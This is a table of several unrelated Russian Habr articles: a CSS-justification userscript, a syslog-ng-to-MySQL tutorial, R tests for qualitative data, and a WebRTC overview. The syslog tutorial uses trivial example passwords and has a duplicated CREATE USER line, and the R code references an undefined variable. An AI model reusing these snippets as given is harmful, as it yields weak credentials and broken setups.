text stringlengths 20 1.01M | url stringlengths 14 1.25k | dump stringlengths 9 15 ⌀ | lang stringclasses 4
values | source stringclasses 4
values |
|---|---|---|---|---|
# Как отформатировать текст в Интернет по ширине с переносами
Большинство сайтов в интернете используют выравнивание текста влево и не используют переносы. Дизайнеры [утверждают](https://maxwellforbes.com/posts/web-justified-text/), что возможности браузеров по форматированию текста далеки от возможностей настольных издательских систем в плане изменения расстояния между словами, между отдельными символами в словах, расстановке переносов и т. д. Все выглядит ужасно, поэтому рекомендуется никогда не использовать выравнивание текста по ширине в Web.
Однако, я решил попробовать читать новостные сайты, habr или lib.ru с "книжным форматированием".
Для внесения изменений в сторонние web-страницы я использую расширение браузера [Tampermonkey](https://www.tampermonkey.net/). Вот скрипт, который меняет форматирование текста на Хабре и других сайтах, которые нужно перечислить в директивах `@match`:
```
// ==UserScript==
// @name P-justify-hyphens
// @version 0.1
// @description try to take over the world!
// @match https://www.rbc.ru/*
// @match https://lenta.ru/*
// @match https://habr.com/*
// ==/UserScript==
(function() {
'use strict';
var styles = `
p {
-webkit-hyphens: auto;
-moz-hyphens: auto;
-ms-hyphens: auto;
text-align: justify;
}
`;
var styleSheet = document.createElement("style");
styleSheet.innerText = styles;
document.head.appendChild(styleSheet);
document.documentElement.setAttribute("lang", 'ru');
})();
```
На lib.ru есть формат вывода книг под названием "Fine HTML". Чтобы его можно было читать, кроме выравнивания абзацев и переносов ему нужны поля. Поэтому для lib.ru я сделал отдельный скрипт:
```
// ==UserScript==
// @name lib.ru-justify-hyphens
// @version 0.1
// @description try to take over the world!
// @match http://lib.ru/*.html
// ==/UserScript==
(function() {
'use strict';
var styles = `
body {
-moz-hyphens: auto;
text-align: justify;
font-size: 28;
margin-left:500px;
margin-right:500px;
}
`;
var styleSheet = document.createElement("style");
styleSheet.innerText = styles;
document.head.appendChild(styleSheet);
document.documentElement.setAttribute("lang", 'ru');
})();
``` | https://habr.com/ru/post/661689/ | null | ru | null |
# syslog-ng+MySQL+Net Source
Задача: Поднять syslog сервер, с хранением логов в SQL базе и cделать возможным
скидывать туда логи с других клиентов *роутеров например*
Что нужно: unix like ОС (хотя даже на ОС семейства Windows это можно сделать), syslog-ng, MySQL и понятие, для чего это на фиг нужно.
Предупрежу сразу, все происходить в окружении gentoo linux. И идем по шагам.
*syslog-ng*
Устанавливаем это чудо, только не забываем добавить пару юзов
`user$ echo "app-admin/syslog-ng sql tcpd"|sudo tee -a /etc/portage/packages.use
user$ emerge -av app-admin/syslog-ng`
Все супер, далее правим конфиг */etc/syslog-ng/syslog-ng.conf* и что бы
получилось, что то похожее на мое:
`1. options {
2. ## general settings
3. time\_reopen(10); # Reopen a dead connection after this many seconds
4. time\_reap(120); # Close an idle destination file after this many seconds
5. time\_sleep(5); # Wait these many milliseconds between poll iterations
6. ts\_format(rfc3164); # Timestamp format: rfc3164|rfc3339|bsd|iso
7. log\_fifo\_size(1000); # Output queue size
8. log\_msg\_size(8192); # Max size of a single message
9. log\_fetch\_limit(1000); # The maximum number of messages fetched from a source during a single poll loop.
10. flush\_lines(10); # Buffer this many lines of output (0 to send to disk immediately)
11. flush\_timeout(1000); # Wait at most this many milliseconds before forcibly flushing the output buffer
12. mark\_freq(300); # MARK line logging interval
13. stats\_freq(0); # Stats logging interval (0 = disabled)
14. ## remote logging
15. normalize\_hostnames(yes); # Do normalize hostnames (transform to lower case)
16. chain\_hostnames(on); # Chain hostnames?
17. keep\_hostname(yes); # Keep the hostname the client sent?
18. keep\_timestamp(no); # Do not use the timestamp the client sent -- it might be wrong
19. use\_dns(yes); # Use DNS? Good for log servers.
20. use\_fqdn(no); # Use FQDNs? Good for log servers.
21. dns\_cache(yes); # Cache DNS results?
22. dns\_cache\_size(1024); # Number of DNS lookup results to cache
23. dns\_cache\_expire(3600); # Expire cached successful DNS lookup results after this many seconds
24. dns\_cache\_expire\_failed(60); # Expire cached failed DNS lookup results after this many seconds
25. ## log file handling
26. create\_dirs(yes); # Create directories for log files if they don't exist
27. dir\_owner("root"); # Owner of newly created directories
28. dir\_group("log"); # Group of newly created directories
29. dir\_perm(0750); # Permissions of newly created directories
30. owner("root"); # Owner of newly created log files
31. group("log"); # Group of newly created log files
32. perm(0640); # Permissions of newly created log files
33. ## misc
34. bad\_hostname("^gconfd$");
35. };
36.
37. #От куда мы будем получать локальные логи
38. source src\_local {
39. unix-stream("/dev/log" max-connections(1000));
40. internal();
41. };
42. #Если ядру не хорошо, он жалуется туда
43. source src\_kernel {
44. file("/proc/kmsg" flags(kernel) log\_prefix("kernel: "));
45. };
46. #Открываем доступ к серверу. 0.0.0.0 - можно заменить на какой то конкретный
47. source src\_rem { udp(ip("0.0.0.0") port(514));
48. tcp(ip("0.0.0.0") port(514)); };
49. #Самое интересно, путь назначение логов будет БД.
50. # syslogpaster - это пользователь которого мы создадим далле, он будет иметь возможность только "вставлять" в БД, больше ему не чего не нужно.
51. destination d\_my\_server\_mysql {
52. program("/usr/bin/mysql --user=syslogpaster --password='MYSUPERPASSWORD' syslog < /var/log/mysql.pipe");
53. pipe ("/var/log/mysql.pipe"
54. # Так как я не хочу что бы все логи были в одной таблицы, я для каждого устройства создал по таблице, это даллее
55. template("INSERT INTO MY\_SERVER (host, facility, priority, level, tag, date, time, program, msg) VALUES ( '$HOST', '$FACILITY', '$PRIORITY', '$LEVEL','$TAG','$YEAR-$MONTH-$DAY', '$HOUR:$MIN:$SEC', '$PROGRAM', '$MSG' );")
56. template-escape(yes)); };
57.
58. destination d\_dslmodem\_mysql {
59. program("/usr/bin/mysql --user=syslogpaster --password='MYSUPERPASSWORD' syslog < /var/log/mysql.pipe");
60. pipe ("/var/log/mysql.pipe"
61. template("INSERT INTO dslmodem (host, facility, priority, level, tag, date, time, program, msg) VALUES ( '$HOST', '$FACILITY', '$PRIORITY', '$LEVEL','$TAG','$YEAR-$MONTH-$DAY', '$HOUR:$MIN:$SEC', '$PROGRAM', '$MSG' );")
62. template-escape(yes)); };
63.
64. destination d\_wifi\_mysql {
65. program("/usr/bin/mysql --user=syslogpaster --password='MYSUPERPASSWORD' syslog < /var/log/mysql.pipe");
66. pipe ("/var/log/mysql.pipe"
67. template("INSERT INTO wifi (host, facility, priority, level, tag, date, time, program, msg) VALUES ( '$HOST', '$FACILITY', '$PRIORITY', '$LEVEL','$TAG','$YEAR-$MONTH-$DAY', '$HOUR:$MIN:$SEC', '$PROGRAM', '$MSG' );")
68. template-escape(yes)); };
69.
70. # Шаблоны для локальных логов.
71. template t\_logtty { template("${DATE}; ${FACILITY}.${PRIORITY}; ${MSG}"); template*escape(no); };*
72. template t\_admintty { template("${DATE}; ${FACILITY}.${PRIORITY}; ${MSG}"); template*escape(no); };*
73. template t\_local { template("${YEAR}-${MONTH}-${DAY} ${HOUR}:${MIN}:${SEC} ${TZOFFSET}; ${HOST}; ${FACILITY}.${PRIORITY}; ${MSG}"); template\_escape(no); };
74.
75. #Собираем локальные логи и постим их в бд, host указать свой
76. #local log to mysql
77. filter f\_my\_server { host("MY\_SERVER"); };
78. log { source(src\_local); source(src\_kernel); filter(f\_my\_server); destination(d\_my\_server\_mysql); };
79.
80. # А это уже логи с сетевых узлов
81. #remote dslmodem(10.39.1.1)
82. filter f\_dslmodem { host("10.39.1.1"); };
83. log { source(src\_rem); filter(f\_dslmodem); destination(d\_dslmodem\_mysql); };
84.
85. #remote wifi(10.39.0.1)
86. filter f\_wifi { host("10.39.0.1"); };
87. log { source(src\_rem); filter(f\_wifi); destination(d\_wifi\_mysql); };
88.
89.
90. # Ну и пока сервер работает в режиме отладки, мы еще и в файлах логи сохраняем
91. #log to file
92. destination d\_kernel { file("/var/log/kernel.log" template(t\_local)); };
93. log { source(src\_kernel); destination(d\_kernel); };
94. destination d\_logtty { file("/dev/tty10" template(t\_logtty)); };
95. log { source(src\_local); source(src\_kernel); destination(d\_logtty); };
96. destination d\_messages { file("/var/log/messages" template(t\_local)); };
97. log { source(src\_local); source(src\_kernel); source(src\_rem); destination(d\_messages); };`
**MySQL**
Создаем бд с именем syslog
`user$ mysql -u root -p
mysql> CREATE DATABASE syslog;`
Заводим трех пользоватлей:
\* syslogadmin — пользователь имеет все права на бд
\* sysloguser — может только смотреть
\* syslogpaster — может только добавлять в бд
`CREATE USER syslogadmin IDENTIFIED BY '123456789';
CREATE USER syslogadmin IDENTIFIED BY '123456';
CREATE USER syslogpaster IDENTIFIED BY '123456';
GRANT USAGE ON syslog.* TO 'syslogadmin'@'localhost';
GRANT ALL ON syslog.* TO 'syslogadmin'@'localhost';
GRANT RELOAD ON *.* TO 'syslogadmin'@'localhost';
REVOKE ALL PRIVILEGES ON syslog.* FROM 'sysloguser'@'localhost';
GRANT USAGE ON syslog.* TO 'sysloguser'@'localhost';
GRANT SELECT ON syslog.* TO 'sysloguser'@'localhost';
REVOKE ALL PRIVILEGES ON syslog.* FROM 'syslogpaster'@'localhost';
GRANT USAGE ON syslog.* TO 'syslogpaster'@'localhost';
GRANT INSERT ON syslog.* TO 'syslogpaster'@'localhost';`
Теперь создаем таблицы. Структура таблиц одинакова, просто меняем имена:
`CREATE TABLE my_server (
host varchar(32) default NULL,
facility varchar(10) default NULL,
priority varchar(10) default NULL,
level varchar(10) default NULL,
tag varchar(10) default NULL,
date date default NULL,
time time default NULL,
program varchar(15) default NULL,
msg text,
seq int(10) unsigned NOT NULL auto_increment,
PRIMARY KEY (seq),
KEY host (host),
KEY seq (seq),
KEY program (program),
KEY time (time),
KEY date (date),
KEY priority (priority),
KEY facility (facility)
) TYPE=MyISAM;
CREATE TABLE dslmodem (
host varchar(32) default NULL,
facility varchar(10) default NULL,
priority varchar(10) default NULL,
level varchar(10) default NULL,
tag varchar(10) default NULL,
date date default NULL,
time time default NULL,
program varchar(15) default NULL,
msg text,
seq int(10) unsigned NOT NULL auto_increment,
PRIMARY KEY (seq),
KEY host (host),
KEY seq (seq),
KEY program (program),
KEY time (time),
KEY date (date),
KEY priority (priority),
KEY facility (facility)
) TYPE=MyISAM;
CREATE TABLE wifi (
host varchar(32) default NULL,
facility varchar(10) default NULL,
priority varchar(10) default NULL,
level varchar(10) default NULL,
tag varchar(10) default NULL,
date date default NULL,
time time default NULL,
program varchar(15) default NULL,
msg text,
seq int(10) unsigned NOT NULL auto_increment,
PRIMARY KEY (seq),
KEY host (host),
KEY seq (seq),
KEY program (program),
KEY time (time),
KEY date (date),
KEY priority (priority),
KEY facility (facility)
) TYPE=MyISAM;`
**Заключение**
Ну в общем и все запускаем syslog-ng, хотя нет, совсем забыл, надо еще перед
этим создать pipe
`user$ sudo mkfifo /var/log/mysql.pipe
user$ sudo /etc/init.d/syslog-ng start`
И все должно работать ) | https://habr.com/ru/post/56926/ | null | ru | null |
# Статистические тесты в R. Часть 2: Тесты качественных данных
Эта статья — продолжение первой части. В этой серии статей я рассматриваю применение набирающего популярность языка программирования R для решения распространенных статистических задач.
В данной и следующей статье я показываю как выбрать для обработки качественных и количественных данных правильные тесты и реализовать их в R. Данные методы позволяют получить реальное представление об объекте, процессе или явлении по какому-либо параметру, т.е. позволяют сказать «хорошо» или «плохо». Они не потребуют глубоких знаний программирования и статистики, и пригодятся людям различного рода деятельности.
Заинтересовались? Добро пожаловать под кат!
[Часть 1: Бинарная классификация](http://habrahabr.ru/post/167341/)
[Часть 3: Тесты количественных данных](http://habrahabr.ru/post/176795/)
Перед тем как начать, сделаю важное замечание. Самое сложное, выбрать, как анализировать данные. R — это инструмент, он сделает все, что вы ему скажете. Но если вы примените не тот метод, ваши результаты не будут иметь смысла.
#### Немного теории
Тестирование применяется для того, чтобы сравнить две случайные величины, т.е. доказать наличие или отсутствие разницы между ними. Основная идея в том, что происходит сопоставление разницы средних значений и стандартного отклонения.
В статистике оперируют так называемыми гитпотезами. Их всего две. Основная, H0, что отличия нет:

Альтернативная, H1, отличие величин:

Гипотеза может быть и вида x1
Также необходимо задать ошибку первого рода, α. Я упоминал ее в прошлой статье, как (1 — чувствительность) для биноминальной классификации. Это ошибка, с которой мы предсказываем H1. Стандартной α являетя 5%.
Каждый тест на выходе дает 2 значения: тест-статистику и p-значение, что по сути одно и тоже. Кратко объясню что это. Как мы знаем, доверительный интервал (т.е. интервал, в котором случайная величина находится с заданой вероятностью), который мы будет составлять для H0, представляется формулой:

где x — среднее значение, σ — стандартное отклонение.
ζ — это квантиль используемого распределения, т.е. множитель, который соответствует интервалу заданной вероятности. α — ошибка первого рода, т.е. вероятность, что x окажется за пределами интервала.
В тесте имеется значение x альтернативной гипотезы. Тест-статистика характеризует его в размерности квантиля, а p-значение в размерности вероятности. Если p-значение меньше, чем α, либо тест-статистика больше квантиля, то альтернативная гипотеза находится за пределами этого интервала. В этом случае, c вероятностью ошибки alpha, мы принимаем H1, т.к. считаем, что тестируемое значение не может относиться к H0. Тест-статистика и p-значение являются результатами теста.
Если мы построим доверительный интервал, то получим по сути тоже самое. Возможно, многим это будет естественнее. Тем не менее, тесты устроены по принципу p-значения, давайте ими пользоваться и не задумываться на концептуальном уровне (тем более люди этим всю жизнь занимались, видимо, нужно именно так).
##### Выбор методики

Данные являются парными, если оба значения получены с одного объекта. Например, сравнение результатов “до и после” или использование двух алгоритмов на одних данных. Однозначно, что парный тест менее строгий, т.е. эффект можно доказать при меньшей выборке.
##### Этапы работы с данными
Вы определили с чем имеете дело. Что делать дальше. Вот некоторый алгоритм работы.
* Описание. Получить средние значения, среднеквадратичные отклонения, пострить графики распределения
* Принятие решения
+ Соответствующий тест
+ Получение доверительного интервала (в R включено в тесты)
#### Обработка качественных данных
Качественные данные это “да” и “нет”. Примеры применения: сравнение работы двух методик/алгоритмов/отделов компаний, нахожение влияния наличия антивируса на заражение компьютера/курения на рак легих/текста рекламы на факт продажи. Для этих данных работает [биноминальное распределение](http://en.wikipedia.org/wiki/Binomial_distribution).
Для примера я взял несколько абстрактные бинарные данные, две группы по 25 элементов. Каждый элемент это 0 или 1. Будем работать с ними, как я указал выше: сперва красиво представим эти данные (возможно после этого никакие тесты будут не нужны), затем будем проводить анализ.
Для примера, построим биноминальное распределение для первой выборки, полагая, что значение вероятности является истинным. Таким образом, мы получим, как на основании имеющихся данных должна себя вести случайная величина.
```
tab <- read.csv(file="data1.csv", header=TRUE, sep=",", dec=".")
attach(tab)
tab
x1 <- X[Group==1]
x2 <- X[Group==2]
library(graphics)
n <- length(x1)
p1 <- mean(x1)
k <- seq(0, n, by = 1)
plot (k, dbinom(k, n, p), type = "l", ylab = "probability",
main = "Binominal distribution")
```

Если нам интересна вероятность:
```
plot (k/n, dbinom(k, n, p), type = "l", ylab = "probability",
main = "Binominal distribution")
```

Для описания данных нужно предстивить среднюю веоятность с доверительным интервалом для каждой группы. Функция плотности вероятности выглядит следующим образом:

В R нам поможет билиотека binom. Установив ее, используем код:
```
library(binom)
binom.confint(sum(x1), n, conf.level = 0.95, methods = "exact")
binom.confint(sum(x2), n, conf.level = 0.95, methods = "exact")
```

Уже сейчас можно сделать вывод, что хотя разница средних значений существенна, доверительные интервалы пересекаются, что в целом было ожидаемо для таких маленьких выборок. Также отмечу, что если бы вы считали по выше приведенной формуле, то получили другие результаты. В данном расчете используется точный метод, в то время как формула являтся приближенной. Разница уменьшается с увеличением выборки.
Хи-квадрат тест используется для анализа нескольких биноминальных выборок. Он распространен, т.к. его легко провести руками.
```
chisq.test(x1,x2)
```

Нам выдали предупреждение. Дело в том, что хи-квадрат тест является приближенным (хотя даже тут R использует дополнительную коррекцию, ее можно отключить, если нужно). Для маленьких выборок он дает ошибку. Существует более сложный, но абсолютно точный тест, учитывающий неизвестность некоторых параметров, неучтенную в хи-квадрат тесте. Это тест Фишера.
```
fisher.test(x1, x2)
```

P-значение 9.915%, что больше, чем 5%. Поэтому оставляем гипотезу H0 — разницы между величинами нет.
Для этих тестов можно брать несколько групп. В этом случае H1 будет отражать отличие хотя бы одной группы от других.
#### Итоги
На этом я завершаю эту статью. Сегодня я рассказал о том, как использовать тесты, как выбрать подходящий тест, а также подробно разобрал анализ качественных данных, применение хи-квадрат теста и теста Фишера. Текста было больше, чем R, но никуда не деться. В следующей, я перейду к анализу количественных выборок.
[Файлы примера](http://rusfolder.com/35149696)
P.S. Жду правок, дополнений и альтернативных точек зрения в комментариях. | https://habr.com/ru/post/168877/ | null | ru | null |
# Как работает JS: WebRTC и механизмы P2P-коммуникаций
**[Советуем почитать] Другие 19 частей цикла**Часть 1: [Обзор движка, механизмов времени выполнения, стека вызовов](https://habrahabr.ru/company/ruvds/blog/337042/)
Часть 2: [О внутреннем устройстве V8 и оптимизации кода](https://habrahabr.ru/company/ruvds/blog/337460/)
Часть 3: [Управление памятью, четыре вида утечек памяти и борьба с ними](https://habrahabr.ru/company/ruvds/blog/338150/)
Часть 4: [Цикл событий, асинхронность и пять способов улучшения кода с помощью async / await](https://habrahabr.ru/company/ruvds/blog/340508/)
Часть 5: [WebSocket и HTTP/2+SSE. Что выбрать?](https://habrahabr.ru/company/ruvds/blog/342346/)
Часть 6: [Особенности и сфера применения WebAssembly](https://habrahabr.ru/company/ruvds/blog/343568/)
Часть 7: [Веб-воркеры и пять сценариев их использования](https://habrahabr.ru/company/ruvds/blog/348424/)
Часть 8: [Сервис-воркеры](https://habrahabr.ru/company/ruvds/blog/349858/)
Часть 9: [Веб push-уведомления](https://habrahabr.ru/company/ruvds/blog/350486/)
Часть 10: [Отслеживание изменений в DOM с помощью MutationObserver](https://habrahabr.ru/company/ruvds/blog/351256/)
Часть 11: [Движки рендеринга веб-страниц и советы по оптимизации их производительности](https://habrahabr.ru/company/ruvds/blog/351802/)
Часть 12: [Сетевая подсистема браузеров, оптимизация её производительности и безопасности](https://habr.com/company/ruvds/blog/354070/)
Часть 12: [Сетевая подсистема браузеров, оптимизация её производительности и безопасности](https://habr.com/company/ruvds/blog/354070/)
Часть 13: [Анимация средствами CSS и JavaScript](https://habr.com/company/ruvds/blog/354438/)
Часть 14: [Как работает JS: абстрактные синтаксические деревья, парсинг и его оптимизация](https://habr.com/company/ruvds/blog/415269/)
Часть 15: [Как работает JS: классы и наследование, транспиляция в Babel и TypeScript](https://habr.com/company/ruvds/blog/415377/)
Часть 16: [Как работает JS: системы хранения данных](https://habr.com/company/ruvds/blog/415505/)
Часть 17: [Как работает JS: технология Shadow DOM и веб-компоненты](https://habr.com/company/ruvds/blog/415881/)
Часть 18: [Как работает JS: WebRTC и механизмы P2P-коммуникаций](https://habr.com/company/ruvds/blog/416821/)
Часть 19: [Как работает JS: пользовательские элементы](https://habr.com/company/ruvds/blog/419831/)
Сегодня мы публикуем перевод 18 части серии материалов, посвящённых всему, что связано с JavaScript. Здесь мы поговорим о технологии WebRTC, которая направлена на организацию прямого обмена данными между браузерными приложениями в реальном времени.
[](https://habr.com/company/ruvds/blog/416821/)
Обзор
-----
Что такое WebRTC? Для начала стоит сказать, что аббревиатура RTC расшифровывается как Real Time Communication (связь в режиме реального времени). Уже одно это даёт немало информации о данной технологии.
WebRTC занимает весьма важную нишу среди механизмов веб-платформы. Ранее P2P-технологии (peer-to-peer, соединения типа «точка-точка», одноранговые, пиринговые сети), используемые такими приложениями, как настольные чаты, давали им возможности, которых не было у веб-проектов. WebRTC меняет ситуацию в лучшую для веб-технологий сторону.
WebRTC, если рассматривать эту технологию в общих чертах, позволяет веб-приложениям создавать P2P-соединения, о которых мы поговорим ниже. Кроме того, мы затронем здесь следующие темы для того, чтобы показать полную картину внутреннего устройства WebRTC:
* P2P-коммуникации.
* Файрволы и технология NAT Traversal.
* Сигналирование, сессии и протоколы.
* API WebRTC.
P2P-коммуникации
----------------
Предположим, два пользователя запустили, каждый в своём браузере, приложение, которое позволяет организовать видеочат с использованием WebRTC. Они хотят установить P2P-соединение. После того, как решение принято, нужен механизм, который позволяет браузерам пользователей обнаружить друг друга и наладить связь с учётом имеющихся в системах механизмов защиты информации. После установки связи пользователи смогут обмениваться мультимедийной информацией в реальном времени.
Одна из главных сложностей, связанных с P2P-соединениями браузеров заключается в том, что браузерам сначала надо обнаружить друг друга, после чего — установить сетевое соединение, основанного на сокетах для обеспечения двунаправленной передачи данных. Предлагаем обсудить сложности, связанные с установкой подобных соединений.
Когда веб-приложению нужны какие-то данные или ресурсы, оно загружает их с сервера и на этом всё заканчивается. Адрес сервера известен приложению. Если же речь идёт, например, о создании P2P-чата, работа которого основана на прямом соединении браузеров, адреса этих браузеров заранее неизвестны. В результате для того, чтобы установить P2P-соединение, придётся справиться с некоторыми проблемами.
Файрволы и протокол NAT Traversal
---------------------------------
Обычные компьютеры, как правило, не имеют назначенных им статических внешних IP-адресов. Причина этого заключается в том, что подобные компьютеры обычно находятся за файрволами и NAT-устройствами.
NAT — это механизм, который транслирует внутренние локальные IP-адреса, расположенные за файрволом, во внешние глобальные IP-адреса. Технология NAT используется, во-первых, из соображений безопасности, а во-вторых — из-за ограничений, накладываемым протоколом IPv4 на количество доступных глобальных IP-адресов. Именно поэтому веб-приложения, использующие WebRTC, не должны полагаться на то, что текущее устройство имеет глобальный статический IP-адрес.
Посмотрим как работает NAT. Если вы находитесь в корпоративной сети и подключились к WiFi, вашему компьютеру будет назначен IP-адрес, который существует только за вашим NAT-устройством. Предположим, что это — IP-адрес 172.0.23.4. Для внешнего мира, однако, ваш IP-адрес может выглядеть как 164.53.27.98. Внешний мир, в результате, видит ваши запросы как приходящие с адреса 164.53.27.98, но, благодаря NAT, ответы на запросы, выполненные вашим компьютером к внешним сервисам, будут отправлены на ваш внутренний адрес 172.0.23.4. Это происходит с использованием таблиц трансляций. Обратите внимание на то, что в дополнение к IP-адресу для организации сетевого взаимодействия нужен ещё и номер порта.
Учитывая то, что в процесс взаимодействия вашей системы с внешним миром вовлечён NAT, вашему браузеру, для установления WebRTC-соединения, нужно узнать IP-адрес компьютера, на котором работает браузер, с которым вы хотите связаться.
Именно здесь на сцену выходят серверы STUN (Session Traversal Utilities for NAT) и TURN (Traversal Using Relays around NAT). Для обеспечения работы технологии WebRTC сначала делается запрос к STUN-серверу, направленный на то, чтобы узнать ваш внешний IP-адрес. Фактически, речь идёт о запросе, выполняемом к удалённому серверу с целью выяснить то, с какого IP-адреса сервер получает этот запрос. Удалённый сервер, получив подобный запрос, отправит ответ, содержащий видимый ему IP-адрес.
Исходя из предположения работоспособности этой схемы и того, что вы получили сведения о своём внешнем IP-адресе и порте, затем вы можете сообщить другим участникам системы (будем называть их «пирами») о том, как связаться с вами напрямую. Эти пиры, кроме того, могут сделать то же самое, используя STUN или TURN-серверы, и могут сообщить вам о том, какие адреса назначены им.
Сигналирование, сессии и протоколы
----------------------------------
Процесс выяснения сетевой информации, описанный выше, является одной из частей большой системы сигналирования, которая основана, в случае с WebRTC, на стандарте JSEP (JavaScript Session Establishment Protocol). Сигналирование включает в себя обнаружение сетевых ресурсов, создание сессий и управление ими, обеспечение безопасности связи, координацию параметров медиаданных, обработку ошибок.
Для того чтобы соединение работало, пиры должны договориться о форматах данных, которыми они будут обмениваться, и собрать сведения о сетевых адресах компьютера, на котором работает приложение. Механизм сигналирования для обмена этой важнейшей информацией не является частью API WebRTC.
Сигналирование не определяется стандартом WebRTC, и оно не реализуется в его API для того, чтобы обеспечить гибкость в используемых технологиях и протоколах. За сигналирование и серверы, которые его поддерживают, отвечает разработчик WebRTC-приложения.
Исходя из предположения о том, что ваше WebRTC-приложение, работающее в браузере, способно определить внешний IP-адрес браузера, используя STUN, как описано выше, следующим шагом является шаг обсуждения параметров сессии и установки соединения с другим браузером.
Изначальное обсуждение параметров сессии и установление соединения происходит с использованием протокола сигналирования/связи, специализирующегося на мультимедиа-коммуникациях. Этот протокол, кроме того, отвечает за соблюдение правил, в соответствии с которыми осуществляется управление сессией и её прекращение.
Один из таких протоколов называется SIP (Session Initiation Protocol). Обратите внимание на то, что благодаря гибкости подсистемы сигналирования WebRTC, SIP — это не единственный протокол сигналирования, который можно использовать. Выбранный протокол сигналирования, кроме того, должен работать с протоколом уровня приложения, который называется SDP (Session Description Protocol), который используется при применении WebRTC. Все метаданные, имеющие отношение к мультимедиа-данным, передаются с использованием протокола SDP.
Любой пир (то есть — приложение, использующее WebRTC), который пытается связаться с другим пиром, генерирует набор маршрутов-кандидатов протокола ICE (Interactive Connectivity Establishment). Кандидаты представляют некую комбинацию IP-адреса, порта и транспортного протокола, которые можно использовать. Обратите внимание на то, что один компьютер может обладать множеством сетевых интерфейсов (проводных, беспроводных, и так далее), поэтому ему может быть назначено несколько IP-адресов, по одному на каждый интерфейс.
Вот диаграмма с MDN, иллюстрирующая вышеописанный процесс обмена данными.

*Процесс обмена данными, необходимыми для установления P2P-соединения*
Установление соединения
-----------------------
Каждый пир сначала выясняет свой внешний IP-адрес как описано выше. Затем динамически создаются «каналы» сигналирующих данных, служащие для обнаружения пиров и поддержки обмена данными между ними, для обсуждения параметров сессий и их установки.
Эти «каналы» неизвестны и недоступны внешнему миру, для доступа к ним требуется уникальный идентификатор.
Обратите внимание на то, что благодаря гибкости WebRTC, и тому факту, что процесс сигналирования не определён стандартом, концепция «каналов» и порядок их использования могут слегка различаться в зависимости от используемых технологий. На самом деле, некоторые протоколы не требуют наличия механизма «каналов» для организации обмена данными. Мы, для целей этого материала, предполагаем, что «каналы» в реализации системы используются.
Если два или более пиров подключены к одному и тому же «каналу», пиры получают возможность обмениваться данными и обсуждать информацию о сессии. Этот процесс похож на шаблон [издатель-подписчик](https://en.wikipedia.org/wiki/Publish%E2%80%93subscribe_pattern). В целом, инициирующий соединение пир отправляет «предложение», используя протокол сигналирования, такой, как SIP или SDP. Инициатор ожидает получения «ответа» от получателя предложения, который подключён к рассматриваемому «каналу».
После того, как ответ получен, происходит процесс определения и обсуждения лучших ICE-кандидатов, собранных каждым пиром. После того, как выбраны оптимальные ICE-кандидаты, согласовываются параметры данных, которыми будут обмениваться пиры и механизм сетевой маршрутизации (IP-адрес и порт).
Затем устанавливается активная сетевая сокет-сессия между пирами. Далее, каждый пир создаёт локальные потоки данных и конечные точки каналов данных, и начинается двусторонняя передача мультимедиа-данных с использованием применяемой технологии.
Если процесс переговоров о выборе наилучшего ICE-кандидата успехом не увенчался, что иногда происходит по вине файрволов и NAT-систем, используется запасной вариант, заключающийся в применении, в качестве ретранслятора, TURN-сервера. Этот процесс задействует сервер, который работает как посредник, ретранслирующий данные, которыми обмениваются пиры. Обратите внимание на то, что эта схема не является настоящим P2P-соединением, в которой пиры передают данные напрямую друг другу.
При использовании запасного варианта с применением TURN для обмена данными, каждому пиру уже не нужно знать о том, как связываться с другими и как передавать ему данные. Вместо этого пирам нужно знать, какому внешнему TURN-серверу нужно отправлять мультимедийные данные в реальном времени и от какого сервера их нужно получать в течение сеанса связи.
Важно понимать, что сейчас речь шла о резервном способе организации связи. TURN-серверы должны быть весьма надёжными, иметь большую полосу пропускания и серьёзную вычислительную мощность, поддерживать работу с потенциально большими объёмами данных. Использование TURN-сервера, таким образом, очевидно, приводит к дополнительным затратам и к увеличению сложности системы.
API WebRTC
----------
Есть три основных категории API, существующих в WebRTC:
* API Media Capture and Streams ответственно за захват мультимедиа-данных и работу с потоками. Это API позволяет подключаться к устройствам ввода, таким, как микрофоны и веб-камеры, и получать от них потоки медиа-данных.
* API RTCPeerConnection . Используя API данной категории можно, с одной конечной точки WebRTC, отправлять, в реальном времени, захваченный поток аудио или видеоданных через интернет другой конечной точке WebRTC. Используя это API можно создавать соединения между локальной машиной и удалённым пиром. Оно предоставляет методы для соединения с удалённым пиром, для управления соединением и для отслеживания его состояния. Его же механизмы используются для закрытия ненужных соединений.
* API RTCDataChannel . Механизмы, представленные этим API, позволяют передавать произвольные данные. Каждый канал данных (data channel) связан с интерфейсом RTCPeerConnection.
Поговорим об этих API.
API Media Capture and Streams
-----------------------------
API Media Capture and Streams, которое часто называют Media Stream API или Stream API — это API, которое поддерживает работу с потоками аудио и видео-данных, методы для работы с ними. Средствами этого API задаются ограничения, связанные с типами данных, здесь имеются коллбэки успешного и неуспешного завершения операций, применяемые при использовании асинхронных механизмов работы с данными, и события, которые вызываются в процессе работы.
Метод `getUserMedia()` API [MediaDevices](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices) запрашивает у пользователя разрешение на работу с устройствами ввода, которые производят потоки [MediaStream](https://developer.mozilla.org/en-US/docs/Web/API/MediaStream) со звуковыми или видео-дорожками, содержащими запрошенные типы медиаданных. Такой поток может включать, например, видеодорожку (её источником является либо аппаратный либо виртуальный видеоисточник, такой как камера, устройство для записи видео, сервис совместного использования экрана и так далее), аудиодорожку (её, похожим образом, могут формировать физические или виртуальные аудиоисточники, наподобие микрофона, аналогово-цифрового конвертера, и так далее), и, возможно, дорожки других типов.
Этот метод возвращает [промис](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise), который разрешается в объект [MediaStream](https://developer.mozilla.org/en-US/docs/Web/API/MediaStream). Если пользователь отклонил запрос на получение разрешения, или соответствующие медиаданные недоступны, тогда промис разрешится, соответственно, с ошибкой `PermissionDeniedError` или `NotFoundError`.
Доступ к синглтону `MediaDevice` можно получить через объект `navigator`:
```
navigator.mediaDevices.getUserMedia(constraints)
.then(function(stream) {
/* использовать поток */
})
.catch(function(err) {
/* обработать ошибку */
});
```
Обратите внимание на то, что при вызове метода `getUserMedia()` ему нужно передать объект `constraints`, который сообщает API о том, какой тип потока оно должно вернуть. Тут можно настраивать много всего, включая то, какую камеру требуется использовать (переднюю или заднюю), частоту кадров, разрешение, и так далее.
Начиная с версии 25, браузеры, основанные на Chromium, позволяют передавать аудиоданные из `getUserMedia()` аудио- или видео-элементам (однако, обратите внимание на то, что по умолчанию медиа-элементы будут отключены).
Метод `getUserMedia()` так же может быть использован как [узел ввода для Web Audio API](http://updates.html5rocks.com/2012/09/Live-Web-Audio-Input-Enabled):
